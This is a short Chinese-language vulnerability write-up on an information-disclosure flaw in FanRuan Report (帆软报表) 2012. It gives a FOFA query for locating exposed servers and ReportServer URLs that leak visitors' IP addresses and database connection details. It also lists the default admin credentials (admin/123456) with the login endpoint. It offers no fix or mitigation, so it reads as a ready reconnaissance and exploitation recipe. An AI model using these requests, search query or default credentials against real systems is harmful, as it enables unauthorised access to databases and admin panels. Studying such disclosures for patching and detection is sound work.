# 帆软报表 2012 信息泄露漏洞

## 漏洞描述

帆软报表 2012 存在信息泄露漏洞，通过访问特定的Url获取部分敏感信息

## 漏洞影响

```
帆软报表 2012
```

## FOFA

```
body="down.download?FM_SYS_ID"
```

## 漏洞复现

获取登录报表系统的IP

```plain
http://xxx.xxx.xxx.xxx/ReportServer?op=fr_server&cmd=sc_visitstatehtml&showtoolbar=false
```



![image-20220209113026424](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091130468.png)



数据库信息泄露

```plain
http://xxx.xxx.xxx.xxx/ReportServer?op=fr_server&cmd=sc_getconnectioninfo
```



![image-20220209113041021](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091130098.png)

后台默认口令 admin/123456

```plain
/ReportServer?op=fr_auth&cmd=ah_login&_=new%20Date().getTime()
```